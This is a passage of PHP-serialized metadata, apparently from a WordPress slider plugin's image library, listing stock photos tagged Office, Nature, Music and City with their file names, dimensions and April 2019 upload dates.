10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:179;a:12:{s:2:\"id\";s:3:\"420\";s:6:\"handle\";s:48:\"Yellow-ceramic-mug-beside-gray-aluminum-iMac.jpg\";s:4:\"name\";s:44:\"Yellow ceramic mug beside gray aluminum iMac\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:180;a:12:{s:2:\"id\";s:3:\"419\";s:6:\"handle\";s:11:\"My-desk.jpg\";s:4:\"name\";s:7:\"My desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1315\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:181;a:12:{s:2:\"id\";s:3:\"418\";s:6:\"handle\";s:17:\"Cooperation-2.jpg\";s:4:\"name\";s:13:\"Cooperation 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:182;a:12:{s:2:\"id\";s:3:\"417\";s:6:\"handle\";s:33:\"MacBook-on-top-of-brown-table.jpg\";s:4:\"name\";s:29:\"MacBook on top of brown table\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:183;a:12:{s:2:\"id\";s:3:\"416\";s:6:\"handle\";s:27:\"Beautiful-working-place.jpg\";s:4:\"name\";s:23:\"Beautiful working place\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:184;a:12:{s:2:\"id\";s:3:\"415\";s:6:\"handle\";s:14:\"Typewriter.jpg\";s:4:\"name\";s:10:\"Typewriter\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:185;a:12:{s:2:\"id\";s:3:\"414\";s:6:\"handle\";s:19:\"White-desk-lamp.jpg\";s:4:\"name\";s:15:\"White desk lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:186;a:12:{s:2:\"id\";s:3:\"413\";s:6:\"handle\";s:18:\"Office-working.jpg\";s:4:\"name\";s:14:\"Office working\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:187;a:12:{s:2:\"id\";s:3:\"412\";s:6:\"handle\";s:36:\"Silver-iMac-on-brown-wooden-desk.jpg\";s:4:\"name\";s:32:\"Silver iMac on brown wooden desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1240\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:188;a:12:{s:2:\"id\";s:3:\"411\";s:6:\"handle\";s:23:\"Working-in-progress.jpg\";s:4:\"name\";s:19:\"Working in progress\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:189;a:12:{s:2:\"id\";s:3:\"410\";s:6:\"handle\";s:15:\"Cooperation.jpg\";s:4:\"name\";s:11:\"Cooperation\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:190;a:12:{s:2:\"id\";s:3:\"409\";s:6:\"handle\";s:17:\"Working-place.jpg\";s:4:\"name\";s:13:\"Working place\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:191;a:12:{s:2:\"id\";s:3:\"408\";s:6:\"handle\";s:16:\"Working-desk.jpg\";s:4:\"name\";s:12:\"Working desk\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:33:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:192;a:12:{s:2:\"id\";s:3:\"407\";s:6:\"handle\";s:23:\"low-angle-of-forest.jpg\";s:4:\"name\";s:19:\"low angle of forest\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:193;a:12:{s:2:\"id\";s:3:\"406\";s:6:\"handle\";s:23:\"Lake-under-blue-sky.jpg\";s:4:\"name\";s:19:\"Lake under blue sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1351\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:194;a:12:{s:2:\"id\";s:3:\"405\";s:6:\"handle\";s:21:\"Blue-starry-night.jpg\";s:4:\"name\";s:17:\"Blue starry night\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:195;a:12:{s:2:\"id\";s:3:\"404\";s:6:\"handle\";s:22:\"Aerial-photography.jpg\";s:4:\"name\";s:18:\"Aerial photography\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:196;a:12:{s:2:\"id\";s:3:\"403\";s:6:\"handle\";s:14:\"Red-clouds.jpg\";s:4:\"name\";s:10:\"Red clouds\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:197;a:12:{s:2:\"id\";s:3:\"402\";s:6:\"handle\";s:14:\"Snow-field.jpg\";s:4:\"name\";s:10:\"Snow field\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1227\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:198;a:12:{s:2:\"id\";s:3:\"401\";s:6:\"handle\";s:13:\"White-sky.jpg\";s:4:\"name\";s:9:\"White sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1281\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:199;a:12:{s:2:\"id\";s:3:\"400\";s:6:\"handle\";s:24:\"Trees-covered-by-fog.jpg\";s:4:\"name\";s:20:\"Trees covered by fog\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1277\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:200;a:12:{s:2:\"id\";s:3:\"399\";s:6:\"handle\";s:26:\"Red-and-white-mushroom.jpg\";s:4:\"name\";s:22:\"Red and white mushroom\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:201;a:12:{s:2:\"id\";s:3:\"398\";s:6:\"handle\";s:24:\"Lake-near-pine-trees.jpg\";s:4:\"name\";s:20:\"Lake near pine trees\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:202;a:12:{s:2:\"id\";s:3:\"397\";s:6:\"handle\";s:35:\"After-a-long-day-of-backpacking.jpg\";s:4:\"name\";s:31:\"After a long day of backpacking\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:203;a:12:{s:2:\"id\";s:3:\"396\";s:6:\"handle\";s:32:\"Mountains-during-golden-hour.jpg\";s:4:\"name\";s:28:\"Mountains during golden hour\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:204;a:12:{s:2:\"id\";s:3:\"395\";s:6:\"handle\";s:27:\"Man-looking-on-mountain.jpg\";s:4:\"name\";s:23:\"Man looking on mountain\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:205;a:12:{s:2:\"id\";s:3:\"394\";s:6:\"handle\";s:19:\"Body-of-water-2.jpg\";s:4:\"name\";s:15:\"Body of water 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:206;a:12:{s:2:\"id\";s:3:\"393\";s:6:\"handle\";s:15:\"Brown-cliff.jpg\";s:4:\"name\";s:11:\"Brown cliff\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:207;a:12:{s:2:\"id\";s:3:\"392\";s:6:\"handle\";s:20:\"Green-foggy-tree.jpg\";s:4:\"name\";s:16:\"Green foggy tree\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1417\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:208;a:12:{s:2:\"id\";s:3:\"391\";s:6:\"handle\";s:32:\"Grayscale-photo-of-mountains.jpg\";s:4:\"name\";s:28:\"Grayscale photo of mountains\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:209;a:12:{s:2:\"id\";s:3:\"390\";s:6:\"handle\";s:19:\"Under-sunny-sky.jpg\";s:4:\"name\";s:15:\"Under sunny sky\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:31:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:210;a:12:{s:2:\"id\";s:3:\"389\";s:6:\"handle\";s:16:\"Rock-concert.jpg\";s:4:\"name\";s:12:\"Rock concert\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1443\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:211;a:12:{s:2:\"id\";s:3:\"388\";s:6:\"handle\";s:30:\"Group-of-people-in-concert.jpg\";s:4:\"name\";s:26:\"Group of people in concert\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:212;a:12:{s:2:\"id\";s:3:\"387\";s:6:\"handle\";s:6:\"DJ.jpg\";s:4:\"name\";s:2:\"DJ\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:213;a:12:{s:2:\"id\";s:3:\"386\";s:6:\"handle\";s:56:\"Woman-standing-watching-LED-light-musical-instrument.jpg\";s:4:\"name\";s:52:\"Woman standing watching LED light musical instrument\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:214;a:12:{s:2:\"id\";s:3:\"385\";s:6:\"handle\";s:16:\"Concert-hall.jpg\";s:4:\"name\";s:12:\"Concert hall\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:215;a:12:{s:2:\"id\";s:3:\"384\";s:6:\"handle\";s:18:\"Concert-hall-2.jpg\";s:4:\"name\";s:14:\"Concert hall 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1282\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:216;a:12:{s:2:\"id\";s:3:\"383\";s:6:\"handle\";s:29:\"man-playing-upright-piano.jpg\";s:4:\"name\";s:25:\"man playing upright piano\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1340\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:217;a:12:{s:2:\"id\";s:3:\"382\";s:6:\"handle\";s:30:\"person-performing-on-stage.jpg\";s:4:\"name\";s:26:\"person performing on stage\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:218;a:12:{s:2:\"id\";s:3:\"381\";s:6:\"handle\";s:27:\"Brown-string-instrument.jpg\";s:4:\"name\";s:23:\"Brown string instrument\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1272\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:219;a:12:{s:2:\"id\";s:3:\"380\";s:6:\"handle\";s:36:\"silhouette-of-person-with-guitar.jpg\";s:4:\"name\";s:32:\"silhouette of person with guitar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:220;a:12:{s:2:\"id\";s:3:\"379\";s:6:\"handle\";s:14:\"Party-fans.jpg\";s:4:\"name\";s:10:\"Party fans\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:221;a:12:{s:2:\"id\";s:3:\"378\";s:6:\"handle\";s:24:\"Condenser-microphone.jpg\";s:4:\"name\";s:20:\"Condenser microphone\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1440\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:25:26\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:222;a:12:{s:2:\"id\";s:3:\"377\";s:6:\"handle\";s:42:\"Low-angle-photo-of-high-rise-buildings.jpg\";s:4:\"name\";s:38:\"Low angle photo of high rise buildings\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1280\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:5:\"6.0.0\";s:5:\"added\";s:19:\"2019-04-16 10:24:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"2\";}i:223;a:12:{s:2:\"id\";s:3:\"376\";s:6:\"handle\";s:23:\"High-rise-buildings.jpg\";s:4:\"name\";s:19:\"High rise buildings\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"21\";s:6:\"handle\";s:4:\"City\";s:4:\"name\";s:4:\"City\";}}s:11:\"description\";s:8:\"New 